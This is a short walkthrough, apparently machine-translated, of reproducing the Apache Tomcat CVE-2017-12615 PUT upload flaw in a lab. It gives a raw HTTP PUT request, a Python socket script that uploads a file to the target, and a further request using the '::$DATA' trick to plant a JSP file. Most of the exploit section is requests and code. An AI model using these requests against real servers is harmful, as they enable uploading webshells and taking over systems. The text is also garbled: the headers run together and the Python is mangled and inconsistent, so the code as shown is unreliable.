Tomcat cve-2017-12615 remote Upload Vulnerability replication

Vulnerability Name: cve-2017-12615-Remote Code execution vulnerability

cve-2017-12615: Remote code execution vulnerability

When Tomcat is running on the Windows operating system and the HTTP Put request method is enabled (for example, by setting the ReadOnly initialization parameter to false), an attacker would likely be able to upload a JSP file containing arbitrary code to the server through a well-constructed attack request packet , the malicious code in the JSP file will be able to be executed by the server. Cause data disclosure on the server or get server permissions.

With the above two vulnerabilities can execute arbitrary code on the user server, resulting in data leakage or gain server permissions, there is a high security risk.

Impact Range: Apache Tomcat 7.0.0-7.0.81

First download the 7.0.81 version on the Tomcat website

Download Link: http://mirrors.shuosc.org/apache/tomcat/tomcat-7/v7.0.81/bin/apache-tomcat-7.0.81.tar.gz

Build the apache-tomcat-7.0.81.tar.gz file on Linux and put it into the/usr/local/directory

Enter the bin directory in the terminal and enter the./startup.sh to open Tomcat

Subsequent access to the HTTP://192.168.149.129:8080 port provides access to the

Exploit steps

There is a Web. xml file in the/conf/directory to open the add readonly parameter with the property value false

Then send a put packet to the target server

put/123.html/http/1.1 host:192.168.149.129:8080 user-agent:mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) gecko/20101026 firefox/3.6.12dnt:1connection:closecontent-length:664<HTML><Head><title>Hack by SF</title></Head><Body>hack by sf!</Body></HTML>

The packet is a 123.html file generated at the root of the target

Here we write a script using Python.

The code is as follows

ImportSocketpoc=""; buffer= ("put/123.html/http/1.1\r\n""host:192.168.149.129:8080\r\n""user-agent:mozilla/5.0 (Windows; U Windows NT 6.1; He rv:1.9.2.12) gecko/20101026 firefox/3.6.12\r\n""dnt:1\r\n""connection:close\r\n""content-length:664\r\n\r\n"+POC) expl=Socket.socket (Socket.af_inet,socket. SOCK_STREAM); Expl.connect (("192.168.149.129", 8080)); Expl.send (buffer); Expl.close (); 

After running:

Modify the 123.html suffix to upload any file.

Re-attach the Tomcat 7.0.79 POC:

Put/aedoo.jsp:: $DATA http/1.1192.168.1.1:8080Cache-control:max-age=0Upgrade- Insecure-requests:1User-agent:mozilla/5.0 (Windows NT 10.0; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/60.0.3112.113 safari/537.36accept:text/html,application/ xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-language:zh-cn,zh;q=0.8  Cookie:Connection:closeContent-length:22 your JSP ma

Tomcat cve-2017-12615 remote Upload Vulnerability replication